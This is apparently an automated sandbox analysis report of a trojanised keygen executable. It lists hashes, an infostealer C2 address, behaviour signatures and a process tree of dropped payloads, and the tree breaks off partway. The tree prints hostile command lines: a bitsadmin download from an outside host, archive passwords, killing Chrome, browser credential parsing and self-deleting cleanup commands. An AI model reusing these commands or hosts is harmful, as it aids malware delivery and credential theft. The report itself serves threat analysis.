Resubmissions

24-04-2021 06:39

210424-z9rcb7aepa 10

23-04-2021 19:10

210423-eqazybfbwe 10

23-04-2021 19:10

210423-11yc7me6fe 10

23-04-2021 18:20

210423-96m9f6fxjx 10

23-04-2021 13:38

210423-fv1qhsltzj 10

23-04-2021 13:38

210423-6hhapn6pdx 10

23-04-2021 13:38

210423-m5azl6mq1s 10

23-04-2021 13:38

210423-nlvbxenam6 10

23-04-2021 13:38

210423-y4rkc8l6ts 10

23-04-2021 05:23

210423-lejp16ex1n 10

Analysis

  • max time kernel
    1800s
  • max time network
    1800s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    22-04-2021 17:27

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • redline 2 IoCs

    redline_Stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 4 IoCs
  • Drops file in System32 directory 12 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 25 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:340
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:1036
      • C:\Users\Admin\AppData\Roaming\sicicjg
        C:\Users\Admin\AppData\Roaming\sicicjg
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:740
      • C:\Users\Admin\AppData\Roaming\stcicjg
        C:\Users\Admin\AppData\Roaming\stcicjg
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:752
        • C:\Users\Admin\AppData\Roaming\stcicjg
          C:\Users\Admin\AppData\Roaming\stcicjg
          3⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:5364
      • C:\Users\Admin\AppData\Roaming\sicicjg
        C:\Users\Admin\AppData\Roaming\sicicjg
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:4752
      • C:\Users\Admin\AppData\Roaming\stcicjg
        C:\Users\Admin\AppData\Roaming\stcicjg
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:3264
        • C:\Users\Admin\AppData\Roaming\stcicjg
          C:\Users\Admin\AppData\Roaming\stcicjg
          3⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:3988
      • C:\Users\Admin\AppData\Roaming\sicicjg
        C:\Users\Admin\AppData\Roaming\sicicjg
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        PID:740
      • C:\Users\Admin\AppData\Roaming\stcicjg
        C:\Users\Admin\AppData\Roaming\stcicjg
        2⤵
        • Suspicious use of SetThreadContext
        PID:1844
        • C:\Users\Admin\AppData\Roaming\stcicjg
          C:\Users\Admin\AppData\Roaming\stcicjg
          3⤵
          • Checks SCSI registry key(s)
          PID:5100
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1144
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
        1⤵
          PID:1396
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1936
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1408
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
              1⤵
                PID:1092
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                  PID:2416
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                  1⤵
                    PID:2448
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Browser
                    1⤵
                      PID:2580
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2696
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                      1⤵
                        PID:2708
                      • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                        "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                        1⤵
                        • Checks computer location settings
                        • Suspicious use of WriteProcessMemory
                        PID:804
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          • Suspicious use of WriteProcessMemory
                          PID:3252
                          • C:\Windows\SysWOW64\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                            3⤵
                            • Loads dropped DLL
                            • Modifies registry class
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:208
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:652
                          • C:\ProgramData\1329923.exe
                            "C:\ProgramData\1329923.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:416
                          • C:\ProgramData\4959716.exe
                            "C:\ProgramData\4959716.exe"
                            3⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of WriteProcessMemory
                            PID:2320
                            • C:\ProgramData\Windows Host\Windows Host.exe
                              "C:\ProgramData\Windows Host\Windows Host.exe"
                              4⤵
                              • Executes dropped EXE
                              PID:1984
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:3064
                          • C:\Users\Admin\AppData\Local\Temp\is-TI5U6.tmp\Install.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-TI5U6.tmp\Install.tmp" /SL5="$80072,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:3592
                            • C:\Users\Admin\AppData\Local\Temp\is-6TQGJ.tmp\Ultra.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-6TQGJ.tmp\Ultra.exe" /S /UID=burnerch1
                              4⤵
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Drops file in Program Files directory
                              • Suspicious use of WriteProcessMemory
                              PID:2184
                              • C:\Program Files\Windows Defender\LXTUZZHXHE\ultramediaburner.exe
                                "C:\Program Files\Windows Defender\LXTUZZHXHE\ultramediaburner.exe" /VERYSILENT
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:1356
                                • C:\Users\Admin\AppData\Local\Temp\is-BF8IN.tmp\ultramediaburner.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-BF8IN.tmp\ultramediaburner.tmp" /SL5="$201E8,281924,62464,C:\Program Files\Windows Defender\LXTUZZHXHE\ultramediaburner.exe" /VERYSILENT
                                  6⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of WriteProcessMemory
                                  PID:4116
                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4236
                              • C:\Users\Admin\AppData\Local\Temp\65-efe19-b40-b6cb0-e4d15604b628a\Geqaevoqomu.exe
                                "C:\Users\Admin\AppData\Local\Temp\65-efe19-b40-b6cb0-e4d15604b628a\Geqaevoqomu.exe"
                                5⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                PID:4144
                              • C:\Users\Admin\AppData\Local\Temp\47-90f91-5cc-099a0-d07a76d5ca4fd\Syqaeliseqe.exe
                                "C:\Users\Admin\AppData\Local\Temp\47-90f91-5cc-099a0-d07a76d5ca4fd\Syqaeliseqe.exe"
                                5⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of WriteProcessMemory
                                PID:4184
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1xkftkpb.n1m\instEU.exe & exit
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4128
                                  • C:\Users\Admin\AppData\Local\Temp\1xkftkpb.n1m\instEU.exe
                                    C:\Users\Admin\AppData\Local\Temp\1xkftkpb.n1m\instEU.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4596
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\spvxfx5w.4cg\gpooe.exe & exit
                                  6⤵
                                    PID:5132
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\evxtpobk.bsr\google-game.exe & exit
                                    6⤵
                                      PID:5032
                                      • C:\Users\Admin\AppData\Local\Temp\evxtpobk.bsr\google-game.exe
                                        C:\Users\Admin\AppData\Local\Temp\evxtpobk.bsr\google-game.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3816
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                          8⤵
                                          • Loads dropped DLL
                                          PID:4296
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kojifg2h.gey\skipper.exe /s & exit
                                      6⤵
                                        PID:1276
                                        • C:\Users\Admin\AppData\Local\Temp\kojifg2h.gey\skipper.exe
                                          C:\Users\Admin\AppData\Local\Temp\kojifg2h.gey\skipper.exe /s
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5524
                                          • C:\Users\Admin\AppData\Local\Temp\578126497.exe
                                            C:\Users\Admin\AppData\Local\Temp\578126497.exe
                                            8⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:5048
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              9⤵
                                                PID:5452
                                            • C:\Users\Admin\AppData\Local\Temp\743460633.exe
                                              C:\Users\Admin\AppData\Local\Temp\743460633.exe
                                              8⤵
                                              • Executes dropped EXE
                                              PID:5932
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\kojifg2h.gey\skipper.exe & exit
                                              8⤵
                                                PID:5944
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 0
                                                  9⤵
                                                  • Runs ping.exe
                                                  PID:4992
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\veylvmgd.2df\md1_1eaf.exe & exit
                                            6⤵
                                              PID:5716
                                              • C:\Users\Admin\AppData\Local\Temp\veylvmgd.2df\md1_1eaf.exe
                                                C:\Users\Admin\AppData\Local\Temp\veylvmgd.2df\md1_1eaf.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Checks whether UAC is enabled
                                                PID:5920
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uhph3zfo.b11\askinstall36.exe & exit
                                              6⤵
                                                PID:6044
                                                • C:\Users\Admin\AppData\Local\Temp\uhph3zfo.b11\askinstall36.exe
                                                  C:\Users\Admin\AppData\Local\Temp\uhph3zfo.b11\askinstall36.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4744
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                    8⤵
                                                      PID:5188
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /f /im chrome.exe
                                                        9⤵
                                                        • Kills process with taskkill
                                                        PID:5600
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cdfurjft.a3e\WBODJHVIMV.exe & exit
                                                  6⤵
                                                    PID:5060
                                                    • C:\Users\Admin\AppData\Local\Temp\cdfurjft.a3e\WBODJHVIMV.exe
                                                      C:\Users\Admin\AppData\Local\Temp\cdfurjft.a3e\WBODJHVIMV.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:5852
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:4764
                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                          parse.exe -f json -b firefox
                                                          9⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:2820
                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                          parse.exe -f json -b chrome
                                                          9⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:5544
                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                          parse.exe -f json -b edge
                                                          9⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:5560
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\futsemhc.01h\y1.exe & exit
                                                    6⤵
                                                      PID:6120
                                                      • C:\Users\Admin\AppData\Local\Temp\futsemhc.01h\y1.exe
                                                        C:\Users\Admin\AppData\Local\Temp\futsemhc.01h\y1.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:5496
                                                        • C:\Users\Admin\AppData\Local\Temp\bztqwWpveI.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\bztqwWpveI.exe"
                                                          8⤵
                                                            PID:2104
                                                            • C:\Users\Admin\AppData\Roaming\1619119543177.exe
                                                              "C:\Users\Admin\AppData\Roaming\1619119543177.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619119543177.txt"
                                                              9⤵
                                                              • Executes dropped EXE
                                                              PID:6068
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\bztqwWpveI.exe"
                                                              9⤵
                                                                PID:6000
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping 127.0.0.1 -n 3
                                                                  10⤵
                                                                  • Runs ping.exe
                                                                  PID:2180
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\futsemhc.01h\y1.exe"
                                                              8⤵
                                                                PID:4924
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /T 10 /NOBREAK
                                                                  9⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:4152
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0vy3uyy4.gw4\ABCbrowser.exe /VERYSILENT & exit
                                                            6⤵
                                                              PID:4960
                                                              • C:\Users\Admin\AppData\Local\Temp\0vy3uyy4.gw4\ABCbrowser.exe
                                                                C:\Users\Admin\AppData\Local\Temp\0vy3uyy4.gw4\ABCbrowser.exe /VERYSILENT
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:4880
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                  8⤵
                                                                    PID:4628
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3fsrncoe.ifr\toolspab1.exe & exit
                                                                6⤵
                                                                  PID:4972
                                                                  • C:\Users\Admin\AppData\Local\Temp\3fsrncoe.ifr\toolspab1.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\3fsrncoe.ifr\toolspab1.exe
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:5252
                                                                    • C:\Users\Admin\AppData\Local\Temp\3fsrncoe.ifr\toolspab1.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\3fsrncoe.ifr\toolspab1.exe
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:4700
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mhln0w3h.2cx\SunLabsPlayer.exe /S & exit
                                                                  6⤵
                                                                    PID:4804
                                                                    • C:\Windows\System32\Conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      7⤵
                                                                        PID:5032
                                                                      • C:\Users\Admin\AppData\Local\Temp\mhln0w3h.2cx\SunLabsPlayer.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\mhln0w3h.2cx\SunLabsPlayer.exe /S
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Drops file in Program Files directory
                                                                        PID:5896
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4908
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:4600
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:5840
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:4396
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:1860
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:5016
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                      • Checks for any installed AV software in registry
                                                                                      PID:5908
                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                      8⤵
                                                                                      • Download via BitsAdmin
                                                                                      PID:5808
                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -px0ypAyw3wsOiPDD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Program Files directory
                                                                                      PID:652
                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pXModaxNw9V0MI8B -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4884
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:5980
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:4764
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:4988
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:4964
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:6116
                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\WeIhQmrYuBC\WeIhQmrYuBC.dll" WeIhQmrYuBC
                                                                                                8⤵
                                                                                                • Loads dropped DLL
                                                                                                PID:416
                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\WeIhQmrYuBC\WeIhQmrYuBC.dll" WeIhQmrYuBC
                                                                                                  9⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Drops file in System32 directory
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:3420
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:5060
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                                                  8⤵
                                                                                                    PID:4928
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                      PID:2320
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                        PID:6016
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf44FB.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                          PID:2208
                                                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Drops file in Program Files directory
                                                                                                          PID:2432
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p1vlp32h.f1h\GcleanerWW.exe /mixone & exit
                                                                                                      6⤵
                                                                                                        PID:2320
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t0ua4yvb.a5j\inst.exe & exit
                                                                                                        6⤵
                                                                                                          PID:4064
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\t0ua4yvb.a5j\inst.exe
